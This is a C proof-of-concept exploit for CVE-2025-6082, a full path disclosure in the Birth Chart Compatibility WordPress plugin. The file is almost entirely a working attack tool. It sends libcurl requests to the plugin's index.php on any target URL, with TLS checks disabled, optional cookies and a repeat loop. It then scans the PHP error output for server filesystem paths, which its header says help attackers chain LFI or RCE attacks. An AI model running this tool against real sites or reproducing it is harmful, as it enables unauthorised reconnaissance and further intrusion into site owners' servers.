/*
* Exploit Title : Birth Chart Compatibility WordPress Plugin 2.0 - Full Path Disclosure
* Author : Byte Reaper
* Telegram : @ByteReaper0
* CVE : CVE-2025-6082
* Software Link : https://frp.wordpress.org/plugins/birth-chart-compatibility/
* Description : Proof‑of‑Concept exploits the Full Path Disclosure bug in the
* “Birth Chart Compatibility” WordPress plugin (<=v2.0). It sends
* an HTTP GET request to the plugin’s index.php endpoint, captures
* the resulting PHP warning or fatal error, and parses the server’s
* filesystem path (e.g. “/var/www/html/wp-content/plugins/…” or
* “C:\\xampp\\htdocs\\…”). Revealing this path aids attackers in
* chaining further LFI/RCE or reconnaissance attacks.
*/
#include
#include"argparse.h"
#include
#include
#include
#include
#define FULL 2300
const char *url = NULL;
const char *cookies=NULL;
int selecetCookie = 0;
int verbose = 0;
void exitSyscall()
{
__asm__ volatile
(
"xor %%rdi, %%rdi\n\t"
"mov $0x3C, %%rax\n\t"
"syscall\n\t"
:
:
:"rax", "rdi"
);
}
const char *keyFound[] =
{
"Warning:",
"Fatal error:",
"/var/www/",
"C:\\xampp\\"
};
struct Mem
{
char *buffer;
size_t len;
};
size_t write_cb(void *ptr, size_t size, size_t nmemb, void *userdata)
{
size_t total = size * nmemb;
struct Mem *m = (struct Mem *)userdata;
char *tmp = realloc(m->buffer, m->len + total + 1);
if (tmp == NULL)
{
printf("\e[1;31m[-] Failed to allocate memory!\e[0m\n");
exitSyscall();
}
m->buffer = tmp;
memcpy(&(m->buffer[m->len]), ptr, total);
m->len += total;
m->buffer[m->len] = '\0';
return total;
}
void showPath(const char *targetUrl)
{
char full[FULL];
CURLcode curlCode;
struct Mem response = {NULL, 0};
CURL *curl = curl_easy_init();
if (curl == NULL)
{
exitSyscall();
}
response.buffer = NULL;
response.len = 0;
if (verbose)
{
printf("==========================================\e[0m\n");
printf("[+] Cleaning Response...\e[0m\n");
printf("[+] Response Buffer : %s\e[0m\n", response.buffer);
printf("[+] Response Len : %zu\e[0m\n", response.len);
printf("==========================================\e[0m\n");
}
fflush(stdout);
if (curl)
{
snprintf(full, sizeof(full), "%s/wp-content/plugins/birth-chart-compatibility/index.php", targetUrl);
curl_easy_setopt(curl,
CURLOPT_URL,
full);
if (selecetCookie)
{
curl_easy_setopt(curl,
CURLOPT_COOKIEFILE,
cookies);
curl_easy_setopt(curl,
CURLOPT_COOKIEJAR,
cookies);
}
curl_easy_setopt(curl,
CURLOPT_ACCEPT_ENCODING,
"");
curl_easy_setopt(curl,
CURLOPT_FOLLOWLOCATION,
1L);
sleep(1);
curl_easy_setopt(curl,
CURLOPT_WRITEFUNCTION,
write_cb);
curl_easy_setopt(curl,
CURLOPT_WRITEDATA,
&response);
curl_easy_setopt(curl,
CURLOPT_CONNECTTIMEOUT,
5L);
curl_easy_setopt(curl,
CURLOPT_TIMEOUT,
10L);
curl_easy_setopt(curl,
CURLOPT_SSL_VERIFYPEER,
0L);
curl_easy_setopt(curl,
CURLOPT_SSL_VERIFYHOST,
0L);
if (verbose)
{
printf("\e[1;35m------------------------------------------[Verbose Curl]------------------------------------------\e[0m\n");
curl_easy_setopt(curl,
CURLOPT_VERBOSE,
1L);
}
struct curl_slist *h = NULL;
h = curl_slist_append(h,
"Accept: text/html");
h = curl_slist_append(h,
"Accept-Encoding: gzip");
h = curl_slist_append(h,
"Accept-Language: en-US,en");
h = curl_slist_append(h,
"Connection: keep-alive");
h = curl_slist_append(h,
"Referer: http://example.com");
curl_easy_setopt(curl, CURLOPT_HTTPHEADER, h);
long httpCode = 0;
curlCode = curl_easy_perform(curl);
if (curlCode == CURLE_OK)
{
printf("---------------------------------------------------------------------------------------\n");
printf("\e[1;36m[+] Request sent successfully\e[0m\n");
printf("\e[1;33m[+] Input Url : %s\e[0m\n", targetUrl);
printf("\e[1;33m[+] Full Format Url : %s\e[0m\n",full);
curl_easy_getinfo(curl, CURLINFO_RESPONSE_CODE,
&httpCode);
int numberKey = sizeof(keyFound) / sizeof(keyFound[0]);
if (httpCode >= 200 && httpCode < 300)
{
printf("[+] Http Code (200 < 300) !\e[0m\n");
printf("\e[1;32m[+] Http Code : %ld\e[0m\n", httpCode);
printf("\e[1;35m====================================[Response]====================================\e[0m\n");
printf("%s\n", response.buffer);
printf("\e[1;32m[+] Response Len : %zu\e[0m\n", response.len);
printf("\e[1;35m===================================================================================\e[0m\n\n");
for (int k = 0; k < numberKey; k++)
{
const char *found = strstr(response.buffer, keyFound[k]);
if (found)
{
printf("\e[1;34m[+] Keyword found: %s\e[0m\n", keyFound[k]);
printf("\e[1;34m[+] Context: %.100s\e[0m\n", found);
}
}
}
else
{
printf("\e[1;31m[-] Http Code : %ld\e[0m\n", httpCode);
printf("\e[1;31m[-] Please Check Your input Path !\e[0m\n");
printf("\e[1;31m[-] Or Connection in Tragte : (%s)\e[0m\n", targetUrl);
if (verbose)
{
printf("\e[1;35m====================================[Response]====================================\n");
printf("%s\n", response.buffer);
printf("\e[1;32m[+] Response Len : %zu\e[0m\n", response.len);
printf("\e[1;35m===================================================================================\n\n");
}
}
}
else
{
printf("\e[1;31m[-] The request was not sent !\e[0m\n");
if (verbose)
{
printf("\e[1;31m[-] Exit Syscall ...\e[0m\n");
}
printf("\e[1;31m[-] Error : %s\n", curl_easy_strerror(curlCode));
exitSyscall();
}
}
if (response.buffer)
{
free(response.buffer);
response.buffer = NULL;
response.len = 0;
}
curl_easy_cleanup(curl);
}
int main(int argc,
const char **argv)
{
printf
(
"\e[1;91m"
"▄▖▖▖▄▖ ▄▖▄▖▄▖▄▖ ▄▖▄▖▄▖▄▖ \n"
"▌ ▌▌▙▖▄▖▄▌▛▌▄▌▙▖▄▖▙▖▛▌▙▌▄▌ \n"
"▙▖▚▘▙▖ ▙▖█▌▙▖▄▌ ▙▌█▌▙▌▙▖ \n"
"\e[1;97m\t Byte Reaper\e[0m\n"
);
printf("\e[1;91m---------------------------------------------------------------------------------------\e[0m\n");
int loop = 0;
struct argparse_option options[] =
{
OPT_HELP(),
OPT_STRING('u',
"url",
&url,
"Target Url (Base Url)"),
OPT_STRING('c',
"cookies",
&cookies,
"cookies File"),
OPT_BOOLEAN('v',
"verbose",
&verbose,
"Verbose Mode"),
OPT_INTEGER('f',
"loop",
&loop,
"For loop (Request) (Ex : -f 10)"),
OPT_END(),
};
struct argparse argparse;
argparse_init(&argparse,
options,
NULL,
0);
argparse_parse(&argparse,
argc,
argv);
if (!url)
{
printf("\e[1;31m[-] Please Enter Target Url !\e[0m\n");
printf("\e[1;31m[-] Ex : ./exploit -u https://target.com\e[0m\n");
exitSyscall();
}
if (verbose)
{
verbose=1;
}
if (cookies)
{
selecetCookie = 1;
}
if (loop)
{
for (int o = 0; o < loop ; o++)
{
showPath(url);
}
}
showPath(url);
return 0;
}
